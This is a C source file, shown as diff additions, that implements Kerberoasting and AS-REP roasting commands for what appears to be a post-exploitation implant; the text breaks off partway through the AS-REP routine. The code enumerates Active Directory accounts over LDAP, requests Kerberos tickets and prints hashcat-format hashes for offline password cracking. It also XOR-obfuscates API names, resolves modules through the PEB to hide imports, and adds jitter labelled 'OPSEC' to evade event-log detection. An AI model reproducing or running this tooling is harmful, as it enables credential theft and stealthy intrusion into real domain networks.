+#include +#include /* UNICODE_STRING, LSA_STRING */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* LSA / Kerberos structures defined manually for MinGW compatibility */ + +#ifndef _NTSECAPI_MANUAL_KERB +#define _NTSECAPI_MANUAL_KERB + +#ifndef STATUS_SUCCESS +typedef LONG NTSTATUS; +#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) +#endif + +/* LSA_STRING — may already be in winternl.h on some MinGW builds */ +#ifndef _LSA_STRING_DEFINED +#define _LSA_STRING_DEFINED +typedef struct _LSA_STRING2 +{ + USHORT Length; + USHORT MaximumLength; + PCHAR Buffer; +} LSA_STRING, *PLSA_STRING; +#endif + +typedef enum _KERB_PROTOCOL_MESSAGE_TYPE +{ + KerbRetrieveEncodedTicketMessage = 4, +} KERB_PROTOCOL_MESSAGE_TYPE; + +#define KERB_RETRIEVE_TICKET_DONT_USE_CACHE 0x00000001 +#define KERB_RETRIEVE_TICKET_USE_CACHE_ONLY 0x00000002 + +#define KERB_ETYPE_RC4_HMAC_NT 23 +#define KERB_ETYPE_AES256_CTS_HMAC_SHA1_96 18 + +typedef struct _KERB_RETRIEVE_TKT_REQUEST +{ + KERB_PROTOCOL_MESSAGE_TYPE MessageType; + LUID LogonId; + UNICODE_STRING TargetName; + ULONG TicketFlags; + ULONG CacheOptions; + LONG EncryptionType; + HANDLE CredentialsHandle; +} KERB_RETRIEVE_TKT_REQUEST, *PKERB_RETRIEVE_TKT_REQUEST; + +typedef struct _KERB_EXTERNAL_NAME +{ + SHORT NameType; + USHORT NameCount; + UNICODE_STRING Names[1]; +} KERB_EXTERNAL_NAME, *PKERB_EXTERNAL_NAME; + +typedef struct _KERB_CRYPTO_KEY +{ + LONG KeyType; + ULONG Length; + PUCHAR Value; +} KERB_CRYPTO_KEY, *PKERB_CRYPTO_KEY; + +typedef struct _KERB_EXTERNAL_TICKET +{ + PKERB_EXTERNAL_NAME ServiceName; + PKERB_EXTERNAL_NAME TargetName; + PKERB_EXTERNAL_NAME ClientName; + UNICODE_STRING DomainName; + UNICODE_STRING TargetDomainName; + UNICODE_STRING AltTargetDomainName; + KERB_CRYPTO_KEY SessionKey; + ULONG TicketFlags; + ULONG Flags; + LARGE_INTEGER KeyExpirationTime; + LARGE_INTEGER StartTime; + LARGE_INTEGER EndTime; + LARGE_INTEGER RenewUntil; + LARGE_INTEGER TimeSkew; + ULONG EncodedTicketSize; + PUCHAR EncodedTicket; +} KERB_EXTERNAL_TICKET, *PKERB_EXTERNAL_TICKET; + +typedef struct _KERB_RETRIEVE_TKT_RESPONSE +{ + KERB_EXTERNAL_TICKET Ticket; +} KERB_RETRIEVE_TKT_RESPONSE, *PKERB_RETRIEVE_TKT_RESPONSE; + +#endif /* _NTSECAPI_MANUAL_KERB */ + +/* LSA function pointers (secur32.dll — already linked) */ +typedef NTSTATUS(WINAPI *pLsaConnectUntrusted_t)(PHANDLE); +typedef NTSTATUS(WINAPI *pLsaLookupAuthPackage_t)(HANDLE, PLSA_STRING, PULONG); +typedef NTSTATUS(WINAPI *pLsaCallAuthPackage_t)(HANDLE, ULONG, PVOID, ULONG, + PVOID *, PULONG, PNTSTATUS); +typedef NTSTATUS(WINAPI *pLsaFreeReturnBuffer_t)(PVOID); + +static pLsaConnectUntrusted_t fn_LsaConn; +static pLsaLookupAuthPackage_t fn_LsaLookup; +static pLsaCallAuthPackage_t fn_LsaCall; +static pLsaFreeReturnBuffer_t fn_LsaFree; + +/* GetComputerNameExW — removes from IAT */ +typedef BOOL(WINAPI *_KCNX_t)(COMPUTER_NAME_FORMAT, LPWSTR, LPDWORD); +static BOOL _kcnexw(COMPUTER_NAME_FORMAT fmt, LPWSTR buf, LPDWORD sz) +{ + static _KCNX_t fn = NULL; + if (!fn) + { + char fs[22], ks[14]; + volatile unsigned char xk = EVS_KEY; + for (int i = 0; i < (int)sizeof(EVS_fn_GetComputerNameExW); i++) + fs[i] = (char)(EVS_fn_GetComputerNameExW[i] ^ xk); + fs[sizeof(EVS_fn_GetComputerNameExW)] = '\0'; + for (int i = 0; i < (int)sizeof(EVS_dll_kernel32); i++) + ks[i] = (char)(EVS_dll_kernel32[i] ^ xk); + ks[sizeof(EVS_dll_kernel32)] = '\0'; + HMODULE m = _peb_module(ks); + SecureZeroMemory(ks, sizeof(ks)); + if (m) + fn = (_KCNX_t)(void *)GetProcAddress(m, fs); + SecureZeroMemory(fs, sizeof(fs)); + } + return fn ? fn(fmt, buf, sz) : FALSE; +} + +static int lsa_init(void) +{ + char s[32]; + volatile unsigned char _k = EVS_KEY; + + for (int i = 0; i < (int)sizeof(EVS_dll_secur32); i++) + s[i] = (char)(EVS_dll_secur32[i] ^ _k); + s[sizeof(EVS_dll_secur32)] = '\0'; + HMODULE h = _peb_module(s); + if (!h) + h = LoadLibraryA(s); + SecureZeroMemory(s, sizeof(s)); + if (!h) + return -1; + + for (int i = 0; i < (int)sizeof(EVS_fn_LsaConnectUntrusted); i++) + s[i] = (char)(EVS_fn_LsaConnectUntrusted[i] ^ _k); + s[sizeof(EVS_fn_LsaConnectUntrusted)] = '\0'; + fn_LsaConn = (pLsaConnectUntrusted_t)GetProcAddress(h, s); + SecureZeroMemory(s, sizeof(s)); + + for (int i = 0; i < (int)sizeof(EVS_fn_LsaLookupAuthenticationPackage); i++) + s[i] = (char)(EVS_fn_LsaLookupAuthenticationPackage[i] ^ _k); + s[sizeof(EVS_fn_LsaLookupAuthenticationPackage)] = '\0'; + fn_LsaLookup = (pLsaLookupAuthPackage_t)GetProcAddress(h, s); + SecureZeroMemory(s, sizeof(s)); + + for (int i = 0; i < (int)sizeof(EVS_fn_LsaCallAuthenticationPackage); i++) + s[i] = (char)(EVS_fn_LsaCallAuthenticationPackage[i] ^ _k); + s[sizeof(EVS_fn_LsaCallAuthenticationPackage)] = '\0'; + fn_LsaCall = (pLsaCallAuthPackage_t)GetProcAddress(h, s); + SecureZeroMemory(s, sizeof(s)); + + for (int i = 0; i < (int)sizeof(EVS_fn_LsaFreeReturnBuffer); i++) + s[i] = (char)(EVS_fn_LsaFreeReturnBuffer[i] ^ _k); + s[sizeof(EVS_fn_LsaFreeReturnBuffer)] = '\0'; + fn_LsaFree = (pLsaFreeReturnBuffer_t)GetProcAddress(h, s); + SecureZeroMemory(s, sizeof(s)); + + return (fn_LsaConn && fn_LsaLookup && fn_LsaCall && fn_LsaFree) ? 0 : -1; +} + +/* ── DER parser (ticket enc-part extraction) ─────────────────────────────── */ + +static int der_read_len(const uint8_t *buf, size_t total, size_t *off, size_t *out_len) +{ + if (*off >= total) + return -1; + uint8_t b = buf[(*off)++]; + if (!(b & 0x80)) + { + *out_len = b; + return 0; + } + int nb = b & 0x7f; + if (nb == 0 || nb > 4 || *off + nb > total) + return -1; + *out_len = 0; + for (int i = 0; i < nb; i++) + *out_len = (*out_len << 8) | buf[(*off)++]; + return 0; +} + +/* Advance past one TLV; return pointer to value and its length */ +static int der_next(const uint8_t *buf, size_t total, size_t *off, + uint8_t *tag_out, const uint8_t **val, size_t *vlen) +{ + if (*off >= total) + return -1; + *tag_out = buf[(*off)++]; + size_t l; + if (der_read_len(buf, total, off, &l)) + return -1; + if (*off + l > total) + return -1; + *val = buf + *off; + *vlen = l; + *off += l; + return 0; +} + +/* Find first child TLV with given tag inside a buffer */ +static const uint8_t *der_find(const uint8_t *buf, size_t len, uint8_t tag, size_t *found_len) +{ + size_t off = 0; + uint8_t t; + const uint8_t *v; + size_t vl; + while (der_next(buf, len, &off, &t, &v, &vl) == 0) + if (t == tag) + { + *found_len = vl; + return v; + } + return NULL; +} + +/* + * Extract EncryptedData cipher bytes from a raw Kerberos Ticket DER blob. + * Returns pointer into ticket_der buffer; *cipher_len set on success. + * NULL on failure. + * + * Ticket DER layout: + * 0x61 [APPLICATION 1] + * 0x30 SEQUENCE + * 0xa0 [0] tkt-vno + * 0xa1 [1] realm + * 0xa2 [2] sname + * 0xa3 [3] enc-part EncryptedData + * 0x30 SEQUENCE + * 0xa0 [0] etype INTEGER + * 0xa1 [1] kvno INTEGER (optional) + * 0xa2 [2] cipher OCTET STRING <── we want this + */ +static const uint8_t *ticket_cipher(const uint8_t *ticket_der, size_t ticket_len, + size_t *cipher_len) +{ + size_t off = 0; + uint8_t tag; + const uint8_t *v; + size_t vl; + + /* 0x61 APPLICATION 1 */ + if (der_next(ticket_der, ticket_len, &off, &tag, &v, &vl) || tag != 0x61) + return NULL; + /* 0x30 SEQUENCE */ + const uint8_t *seq; + size_t seq_len; + seq = der_find(v, vl, 0x30, &seq_len); + if (!seq) + return NULL; + /* [3] enc-part */ + const uint8_t *enc; + size_t enc_len; + enc = der_find(seq, seq_len, 0xa3, &enc_len); + if (!enc) + return NULL; + /* SEQUENCE inside enc-part */ + const uint8_t *eseq; + size_t eseq_len; + eseq = der_find(enc, enc_len, 0x30, &eseq_len); + if (!eseq) + return NULL; + /* [2] cipher OCTET STRING */ + const uint8_t *ctx2; + size_t ctx2_len; + ctx2 = der_find(eseq, eseq_len, 0xa2, &ctx2_len); + if (!ctx2) + return NULL; + const uint8_t *ostr; + size_t ostr_len; + ostr = der_find(ctx2, ctx2_len, 0x04, &ostr_len); + if (!ostr || ostr_len < 17) + return NULL; + *cipher_len = ostr_len; + return ostr; +} + +/* ── LDAP helpers ──────────────────────────────────────────────────────────── */ + +/* Get defaultNamingContext from rootDSE */ +static char *ldap_get_base_dn(LDAP *ld) +{ + LDAPMessage *res = NULL; + char *attrs[] = {"defaultNamingContext", NULL}; + if (ldap_search_s(ld, "", LDAP_SCOPE_BASE, "(objectClass=*)", attrs, 0, &res) != LDAP_SUCCESS) + return NULL; + LDAPMessage *e = ldap_first_entry(ld, res); + if (!e) + { + ldap_msgfree(res); + return NULL; + } + char **vals = ldap_get_values(ld, e, "defaultNamingContext"); + char *dn = (vals && vals[0]) ? _strdup(vals[0]) : NULL; + if (vals) + ldap_value_free(vals); + ldap_msgfree(res); + return dn; +} + +/* ── Hex encoding ─────────────────────────────────────────────────────────── */ + +static void hex_append(char *buf, size_t bufsz, size_t *pos, + const uint8_t *data, size_t len) +{ + for (size_t i = 0; i < len && *pos + 2 < bufsz; i++) + { + *pos += snprintf(buf + *pos, bufsz - *pos, "%02x", data[i]); + } +} + +/* ── Random jitter (OPSEC: space out TGS/AS-REQ events) ─────────────────── */ + +static void opsec_jitter(void) +{ + DWORD ms = 40 + (DWORD)(rand() % 80); /* 40–120 ms */ + Sleep(ms); +} + +/* ── Kerberoasting ──────────────────────────────────────────────────────── */ + +int cmd_kerberoast(const char *args, char *output_buf, size_t output_size) +{ + int etype = KERB_ETYPE_RC4_HMAC_NT; + if (args && strstr(args, "aes")) + etype = KERB_ETYPE_AES256_CTS_HMAC_SHA1_96; + + if (lsa_init() != 0) + return snprintf(output_buf, output_size, "[-] secur32 load failed\n"), -1; + + /* Connect to LSA */ + HANDLE hLsa = NULL; + if (fn_LsaConn(&hLsa) != STATUS_SUCCESS) + return snprintf(output_buf, output_size, "[-] lsa connect failed\n"), -1; + + LSA_STRING pkg = {8, 9, "Kerberos"}; + ULONG pkg_id = 0; + if (fn_LsaLookup(hLsa, &pkg, &pkg_id) != STATUS_SUCCESS) + { + CloseHandle(hLsa); + return snprintf(output_buf, output_size, "[-] lsa lookup failed\n"), -1; + } + + /* LDAP: connect + bind with current token */ + LDAP *ld = ldap_init(NULL, LDAP_PORT); + if (!ld) + { + CloseHandle(hLsa); + return snprintf(output_buf, output_size, "[-] ldap_init failed\n"), -1; + } + + ULONG ldap_ver = LDAP_VERSION3; + ldap_set_option(ld, LDAP_OPT_PROTOCOL_VERSION, &ldap_ver); + + if (ldap_bind_s(ld, NULL, NULL, LDAP_AUTH_NEGOTIATE) != LDAP_SUCCESS) + { + ldap_unbind(ld); + CloseHandle(hLsa); + return snprintf(output_buf, output_size, "[-] ldap_bind failed (not domain joined?)\n"), -1; + } + + char *base_dn = ldap_get_base_dn(ld); + if (!base_dn) + { + ldap_unbind(ld); + CloseHandle(hLsa); + return snprintf(output_buf, output_size, "[-] rootDSE query failed\n"), -1; + } + + /* Find domain FQDN (= Kerberos realm, uppercase) */ + char realm[256] = {0}; + { + WCHAR dom[256] = {0}; + DWORD dlen = 256; + _kcnexw(ComputerNameDnsDomain, dom, &dlen); + WideCharToMultiByte(CP_ACP, 0, dom, -1, realm, sizeof(realm) - 1, NULL, NULL); + for (char *p = realm; *p; p++) + *p = (char)toupper((unsigned char)*p); + } + + /* LDAP search: users with SPN, exclude krbtgt and machine accounts */ + char *attrs[] = {"sAMAccountName", "servicePrincipalName", NULL}; + char *filter = "(&(objectCategory=user)(servicePrincipalName=*)" + "(!samAccountName=krbtgt)(!userAccountControl:1.2.840.113556.1.4.803:=2))"; + + LDAPMessage *res = NULL; + if (ldap_search_s(ld, base_dn, LDAP_SCOPE_SUBTREE, filter, attrs, 0, &res) != LDAP_SUCCESS) + { + free(base_dn); + ldap_unbind(ld); + CloseHandle(hLsa); + return snprintf(output_buf, output_size, "[-] LDAP search failed\n"), -1; + } + free(base_dn); + + size_t pos = 0; + int found = 0; + int err_count = 0; + + for (LDAPMessage *e = ldap_first_entry(ld, res); e; e = ldap_next_entry(ld, e)) + { + char **sam = ldap_get_values(ld, e, "sAMAccountName"); + char **spns = ldap_get_values(ld, e, "servicePrincipalName"); + if (!sam || !sam[0] || !spns || !spns[0]) + { + if (sam) + ldap_value_free(sam); + if (spns) + ldap_value_free(spns); + continue; + } + + /* Request TGS for each SPN on this account */ + for (int si = 0; spns[si]; si++) + { + /* Convert SPN to wide */ + int wlen = MultiByteToWideChar(CP_ACP, 0, spns[si], -1, NULL, 0); + WCHAR *spn_w = (WCHAR *)malloc((size_t)wlen * sizeof(WCHAR)); + if (!spn_w) + continue; + MultiByteToWideChar(CP_ACP, 0, spns[si], -1, spn_w, wlen); + + /* Build LSA request */ + size_t spn_bytes = (size_t)(wlen - 1) * sizeof(WCHAR); + size_t req_sz = sizeof(KERB_RETRIEVE_TKT_REQUEST) + spn_bytes + sizeof(WCHAR); + KERB_RETRIEVE_TKT_REQUEST *req = (KERB_RETRIEVE_TKT_REQUEST *)calloc(1, req_sz); + if (!req) + { + free(spn_w); + continue; + } + + req->MessageType = KerbRetrieveEncodedTicketMessage; + req->CacheOptions = KERB_RETRIEVE_TICKET_DONT_USE_CACHE; /* force new TGS-REQ to DC */ + req->EncryptionType = etype; + req->TargetName.Buffer = (PWSTR)(req + 1); + req->TargetName.Length = (USHORT)spn_bytes; + req->TargetName.MaximumLength = (USHORT)(spn_bytes + sizeof(WCHAR)); + memcpy(req->TargetName.Buffer, spn_w, spn_bytes); + free(spn_w); + + PKERB_RETRIEVE_TKT_RESPONSE resp = NULL; + ULONG resp_sz = 0; + NTSTATUS sub = 0; + NTSTATUS st = fn_LsaCall(hLsa, pkg_id, req, (ULONG)req_sz, + (PVOID *)&resp, &resp_sz, &sub); + free(req); + + if (st != STATUS_SUCCESS || !resp) + { + err_count++; + continue; + } + + PKERB_EXTERNAL_TICKET tkt = &resp->Ticket; + if (!tkt->EncodedTicket || tkt->EncodedTicketSize == 0) + { + fn_LsaFree(resp); + err_count++; + continue; + } + + /* Parse DER ticket → cipher bytes */ + size_t cipher_len = 0; + const uint8_t *cipher = ticket_cipher(tkt->EncodedTicket, + tkt->EncodedTicketSize, + &cipher_len); + if (!cipher || cipher_len < 17) + { + fn_LsaFree(resp); + err_count++; + continue; + } + + /* Emit hashcat line: $krb5tgs$$*$$*$$ */ + int n; + { + char _kt[10]; + _kt[0] = '$'; + _kt[1] = 'k'; + _kt[2] = 'r'; + _kt[3] = 'b'; + _kt[4] = '5'; + _kt[5] = 't'; + _kt[6] = 'g'; + _kt[7] = 's'; + _kt[8] = '$'; + _kt[9] = '\0'; + n = snprintf(output_buf + pos, output_size - pos, + "%s%d$*%s$%s$%s*$", _kt, etype, sam[0], realm, spns[si]); + } + pos += (n > 0) ? (size_t)n : 0; + + hex_append(output_buf, output_size, &pos, cipher, 16); + if (pos < output_size - 1) + output_buf[pos++] = '$'; + hex_append(output_buf, output_size, &pos, cipher + 16, cipher_len - 16); + if (pos < output_size - 1) + output_buf[pos++] = '\n'; + + fn_LsaFree(resp); + found++; + opsec_jitter(); /* OPSEC: space out 4769 events */ + } + + ldap_value_free(sam); + ldap_value_free(spns); + } + + ldap_msgfree(res); + ldap_unbind(ld); + CloseHandle(hLsa); + + if (found == 0 && pos == 0) + { + pos += snprintf(output_buf + pos, output_size - pos, + "[*] no roastable accounts (errors: %d)\n", err_count); + } + else if (err_count > 0) + { + pos += snprintf(output_buf + pos, output_size - pos, + "[*] %d accounts roasted, %d errors\n", found, err_count); + } + + if (pos < output_size) + output_buf[pos] = '\0'; + return (int)pos; +} + +/* ── AS-REP roasting ─────────────────────────────────────────────────────── */ + +/* Minimal DER builder — bottom-up into dynamic buffer */ + +typedef struct +{ + uint8_t *d; + size_t cap; + size_t len; +} derbuf_t; + +static void db_grow(derbuf_t *b, size_t extra) +{ + if (b->len + extra > b->cap) + { + b->cap = b->len + extra + 128; + uint8_t *tmp = (uint8_t *)realloc(b->d, b->cap); + if (!tmp) + { + free(b->d); + b->d = NULL; + b->len = 0; + b->cap = 0; + return; + } + b->d = tmp; + } +} +static void db_push(derbuf_t *b, const uint8_t *data, size_t n) +{ + db_grow(b, n); + if (!b->d) + return; + memcpy(b->d + b->len, data, n); + b->len += n; +} + +/* Insert length prefix + tag before offset 'start' */ +static void db_wrap(derbuf_t *b, size_t start, uint8_t tag) +{ + size_t inner = b->len - start; + uint8_t lbuf[4]; + int llen; + if (inner < 0x80) + { + lbuf[0] = (uint8_t)inner; + llen = 1; + } + else if (inner < 0x100) + { + lbuf[0] = 0x81; + lbuf[1] = (uint8_t)inner; + llen = 2; + } + else + { + lbuf[0] = 0x82; + lbuf[1] = (uint8_t)(inner >> 8); + lbuf[2] = (uint8_t)inner; + llen = 3; + } + db_grow(b, 1 + llen); + memmove(b->d + start + 1 + llen, b->d + start, inner); + b->d[start] = tag; + memcpy(b->d + start + 1, lbuf, llen); + b->len += 1 + llen; +} + +/* Encode DER INTEGER (positive, minimal) */ +static void db_integer(derbuf_t *b, uint32_t val) +{ + uint8_t tmp[5]; + int n = 0; + if (val == 0) + { + tmp[n++] = 0; + } + else + { + uint32_t v = val; + uint8_t bytes[4]; + int nb = 0; + while (v) + { + bytes[nb++] = (uint8_t)(v & 0xff); + v >>= 8; + } + /* big-endian, ensure no sign confusion */ + for (int i = nb - 1; i >= 0; i--) + tmp[n++] = bytes[i]; + if (tmp[0] & 0x80) + { + memmove(tmp + 1, tmp, n); + tmp[0] = 0; + n++; + } /* prepend 0x00 */ + } + size_t s = b->len; + db_push(b, tmp, n); + db_wrap(b, s, 0x02); /* INTEGER */ +} + +/* Encode DER GeneralString */ +static void db_genstr(derbuf_t *b, const char *s) +{ + size_t start = b->len; + db_push(b, (const uint8_t *)s, strlen(s)); + db_wrap(b, start, 0x1b); /* GeneralString */ +} + +/* Encode DER GeneralizedTime (KerberosTime) */ +static void db_ktime(derbuf_t *b, const char *ts) +{ + size_t start = b->len; + db_push(b, (const uint8_t *)ts, strlen(ts)); + db_wrap(b, start, 0x18); /* GeneralizedTime */ +} + +/* + * Build a minimal Kerberos AS-REQ DER blob (no pre-auth) for a given + * username + realm + etype. Returns malloc'd buffer, caller free()s. + * Sets *out_len on success. + */ +static uint8_t *build_asreq(const char *username, const char *realm, + int etype, uint32_t nonce, size_t *out_len) +{ + derbuf_t b = {0}; + + /* ── req-body ────────────────────────────────────────────────────────── */ + size_t rb_start = b.len; + { + /* kdc-options [0] BIT STRING: forwardable(1) | renewable-ok(27) + = 0x40000010 in MSB-first 32-bit field. + BIT STRING: 03 05 00 40 00 00 10 */ + size_t s = b.len; + uint8_t ks[] = {0x03, 0x05, 0x00, 0x40, 0x00, 0x00, 0x10}; + db_push(&b, ks, sizeof(ks)); + db_wrap(&b, s, 0xa0); /* [0] */ + + /* cname [1] PrincipalName */ + { + size_t cn = b.len; + { + size_t pn = b.len; + /* name-type [0] INTEGER 1 (NT-PRINCIPAL) */ + { + size_t ss = b.len; + db_integer(&b, 1); + db_wrap(&b, ss, 0xa0); + } + /* name-string [1] SEQUENCE OF GeneralString { username } */ + { + size_t ns = b.len; + { + size_t ss = b.len; + db_genstr(&b, username); + size_t ss2 = b.len; + (void)ss2; + db_wrap(&b, ss, 0x30); + } + db_wrap(&b, ns, 0xa1); + } + db_wrap(&b, pn, 0x30); /* PrincipalName SEQUENCE */ + } + db_wrap(&b, cn, 0xa1); /* [1] */ + } + + /* realm [2] GeneralString */ + { + size_t s2 = b.len; + db_genstr(&b, realm); + db_wrap(&b, s2, 0xa2); + } + + /* sname [3] PrincipalName { NT-SRV-INST=2, "krbtgt", realm } */ + { + size_t sn = b.len; + { + size_t pn = b.len; + { + size_t ss = b.len; + db_integer(&b, 2); + db_wrap(&b, ss, 0xa0); + } + { + size_t ns = b.len; + { + size_t ss = b.len; + db_genstr(&b, "krbtgt"); + db_wrap(&b, ss, 0x30); + } + { + size_t ss = b.len; + db_genstr(&b, realm); + db_wrap(&b, ss, 0x30); + } + /* Both strings in one SEQUENCE OF */ + size_t inner = b.len - ns; + uint8_t *tmp = (uint8_t *)malloc(inner > 0 ? inner : 1); + if (!tmp) + { + free(b.d); + return NULL; + } + memcpy(tmp, b.d + ns, inner); + b.len = ns; + size_t sq = b.len; + db_push(&b, tmp, inner); + free(tmp); + db_wrap(&b, sq, 0x30); + db_wrap(&b, ns, 0xa1); + } + db_wrap(&b, pn, 0x30); + } + db_wrap(&b, sn, 0xa3); /* [3] */ + } + + /* till [5] "99991231235959Z" */ + { + size_t s2 = b.len; + db_ktime(&b, "99991231235959Z"); + db_wrap(&b, s2, 0xa5); + } + + /* nonce [7] */ + { + size_t s2 = b.len; + db_integer(&b, nonce); + db_wrap(&b, s2, 0xa7); + } + + /* etype [8] SEQUENCE OF INTEGER */ + { + size_t et = b.len; + { + size_t ss = b.len; + db_integer(&b, (uint32_t)etype); + db_wrap(&b, ss, 0x30); + } + db_wrap(&b, et, 0xa8); + } + + db_wrap(&b, rb_start, 0x30); /* KDC-REQ-BODY SEQUENCE */ + } + db_wrap(&b, rb_start, 0xa4); /* req-body [4] */ + + /* ── msg-type [2] INTEGER 10, pvno [1] INTEGER 5 ─ prepend ── */ + /* Prepend in reverse order so they appear first */ + { + derbuf_t front = {0}; + { + size_t s = front.len; + db_integer(&front, 5); + db_wrap(&front, s, 0xa1); + } + { + size_t s = front.len; + db_integer(&front, 10); + db_wrap(&front, s, 0xa2); + } + db_grow(&b, front.len); + memmove(b.d + front.len, b.d, b.len); + memcpy(b.d, front.d, front.len); + b.len += front.len; + free(front.d); + } + + /* ── Wrap: SEQUENCE then APPLICATION 10 ── */ + db_wrap(&b, 0, 0x30); /* KDC-REQ SEQUENCE */ + db_wrap(&b, 0, 0x6a); /* APPLICATION 10 */ + + *out_len = b.len; + return b.d; +} + +/* Parse AS-REP: extract enc-part cipher for hashcat format + * AS-REP DER: [APPLICATION 11] 0x6b + * SEQUENCE + * [0] pvno + * [1] msg-type + * [2] padata (optional) + * [3] crealm + * [4] cname + * [5] ticket + * [6] enc-part EncryptedData <── we want this + */ +static const uint8_t *asrep_cipher(const uint8_t *buf, size_t len, size_t *cipher_len) +{ + size_t off = 0; + uint8_t tag; + const uint8_t *v; + size_t vl; + + /* APPLICATION 11 */ + if (der_next(buf, len, &off, &tag, &v, &vl) || tag != 0x6b) + return NULL; + + /* Find SEQUENCE wrapper */ + const uint8_t *seq; + size_t seq_len; + seq = der_find(v, vl, 0x30, &seq_len); + if (!seq) + return NULL; + + /* [6] enc-part */ + const uint8_t *enc; + size_t enc_len; + enc = der_find(seq, seq_len, 0xa6, &enc_len); + if (!enc) + return NULL; + + /* EncryptedData SEQUENCE */ + const uint8_t *eseq; + size_t eseq_len; + eseq = der_find(enc, enc_len, 0x30, &eseq_len); + if (!eseq) + return NULL; + + /* [2] cipher OCTET STRING */ + const uint8_t *ctx2; + size_t ctx2_len; + ctx2 = der_find(eseq, eseq_len, 0xa2, &ctx2_len); + if (!ctx2) + return NULL; + + const uint8_t *ostr; + size_t ostr_len; + ostr = der_find(ctx2, ctx2_len, 0x04, &ostr_len); + if (!ostr || ostr_len < 17) + return NULL; + + *cipher_len = ostr_len; + return ostr; +} + +/* Send AS-REQ to KDC:88 via TCP, return malloc'd response. *resp_len set. */ +static uint8_t *send_asreq(const char *dc_host, const uint8_t *asreq, size_t asreq_len, + size_t *resp_len) +{ + WSADATA wsa; + WSAStartup(MAKEWORD(2, 2), &wsa); + + struct addrinfo hints = {0}, *ai = NULL; + hints.ai_socktype = SOCK_STREAM; + hints.ai_family = AF_UNSPEC; + if (getaddrinfo(dc_host, "88", &hints, &ai) != 0) + return NULL; + + SOCKET s = socket(ai->ai_family, SOCK_STREAM, IPPROTO_TCP); + if (s == INVALID_SOCKET) + { + freeaddrinfo(ai); + return NULL; + } + + /* 5-second connect timeout */ + DWORD timeout = 5000; + setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout)); + setsockopt(s, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)); + + if (connect(s, ai->ai_addr, (int)ai->ai_addrlen) != 0) + { + freeaddrinfo(ai); + closesocket(s); + return NULL; + } + freeaddrinfo(ai); + + /* TCP Kerberos framing: 4-byte BE length prefix */ + uint8_t len_hdr[4]; + len_hdr[0] = (uint8_t)(asreq_len >> 24); + len_hdr[1] = (uint8_t)(asreq_len >> 16); + len_hdr[2] = (uint8_t)(asreq_len >> 8); + len_hdr[3] = (uint8_t)(asreq_len); + + if (send(s, (char *)len_hdr, 4, 0) != 4 || + send(s, (char *)asreq, (int)asreq_len, 0) != (int)asreq_len) + { + closesocket(s); + return NULL; + } + + /* Read 4-byte response length */ + uint8_t rlen_buf[4] = {0}; + int nr = recv(s, (char *)rlen_buf, 4, MSG_WAITALL); + if (nr != 4) + { + closesocket(s); + return NULL; + } + size_t rlen = ((size_t)rlen_buf[0] << 24) | ((size_t)rlen_buf[1] << 16) | + ((size_t)rlen_buf[2] << 8) | (size_t)rlen_buf[3]; + + if (rlen == 0 || rlen > 65536) + { + closesocket(s); + return NULL; + } + + uint8_t *resp = (uint8_t *)malloc(rlen); + if (!resp) + { + closesocket(s); + return NULL; + } + + size_t got = 0; + while (got < rlen) + { + int n = recv(s, (char *)resp + got, (int)(rlen - got), 0); + if (n <= 0) + break; + got += n; + } + closesocket(s); + + if (got != rlen) + { + free(resp); + return NULL; + } + *resp_len = rlen; + return resp; +} + +int cmd_asreproast(const char *args, char *output_buf, size_t output_size) +{ + (void)args; + + /* Get domain FQDN (= realm) */ + char realm[256] = {0}; + { + WCHAR dom[256] = {0}; + DWORD dlen = 256; + _kcnexw(ComputerNameDnsDomain, dom, &dlen); + WideCharToMultiByte(CP_ACP, 0, dom, -1, realm, sizeof(realm) - 1, NULL, NULL); + for (char *p = realm; *p; p++) + *p = (char)toupper((unsigned char)*p); + } + + /* Get DC hostname — DsGetDcNameW loaded dynamically (removes NETAPI32 IAT entry) */ + char dc_host[512] = {0}; + { + typedef DWORD(WINAPI * DsGDCN_t)(LPCWSTR, LPCWSTR, GUID *, LPCWSTR, ULONG, DOMAIN_CONTROLLER_INFOW **); + static DsGDCN_t _fn = NULL; + if (!_fn) + { + char fs[16], ds[16]; + volatile unsigned char _k = EVS_KEY; + for (int _i = 0; _i < (int)sizeof(EVS_fn_DsGetDcNameW); _i++) + fs[_i] = (char)(EVS_fn_DsGetDcNameW[_i] ^ _k); + fs[sizeof(EVS_fn_DsGetDcNameW)] = '\0'; + for (int _i = 0; _i < (int)sizeof(EVS_dll_netapi32); _i++) + ds[_i] = (char)(EVS_dll_netapi32[_i] ^ _k); + ds[sizeof(EVS_dll_netapi32)] = '\0'; + HMODULE _h = LoadLibraryA(ds); + SecureZeroMemory(ds, sizeof(ds)); + if (_h) + _fn = (DsGDCN_t)(void *)GetProcAddress(_h, fs); + SecureZeroMemory(fs, sizeof(fs)); + } + DOMAIN_CONTROLLER_INFOW *dci = NULL; + if (_fn && _fn(NULL, NULL, NULL, NULL, DS_DIRECTORY_SERVICE_REQUIRED, &dci) == NO_ERROR && dci && dci->DomainControllerName) + { + /* DomainControllerName = \\dcname — skip the \\ */ + WCHAR *p = dci->DomainControllerName; + while (*p == L'\\') + p++; + WideCharToMultiByte(CP_ACP, 0, p, -1, dc_host, sizeof(dc_host) - 1, NULL, NULL); + NetApiBufferFree(dci); + } + } + if (!dc_host[0]) + return snprintf(output_buf, output_size, "[-] DsGetDcName failed\n"), -1; + + /* LDAP: find accounts with DONT_REQUIRE_PREAUTH */ + LDAP *ld = ldap_init(NULL, LDAP_PORT); + if (!ld) + return snprintf(output_buf, output_size, "[-] ldap_init failed\n"), -1; + + ULONG ldap_ver = LDAP_VERSION3; + ldap_set_option(ld, LDAP_OPT_PROTOCOL_VERSION, &ldap_ver); + + if (ldap_bind_s(ld, NULL, NULL, LDAP_AUTH_NEGOTIATE) != LDAP_SUCCESS) + { + ldap_unbind(ld); + return snprintf(output_buf, output_size, "[-] ldap_bind failed\n"), -1; + } + + char *base_dn = ldap_get_base_dn(ld); + if (!base_dn) + { + ldap_unbind(ld); + return snprintf(output_buf, output_size, "[-] rootDSE failed\n"), -1; + } + + char *attrs[] = {"sAMAccountName", NULL}; + /* UAC bit 0x400000 = DONT_REQUIRE_PREAUTH */ + char *filter = "(&(objectCategory=user)" + "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" + "(!userAccountControl:1.2.840.113556.1.4.803:=2))"; + + LDAPMessage *res = NULL; + if (ldap_search_s(ld, base_dn, 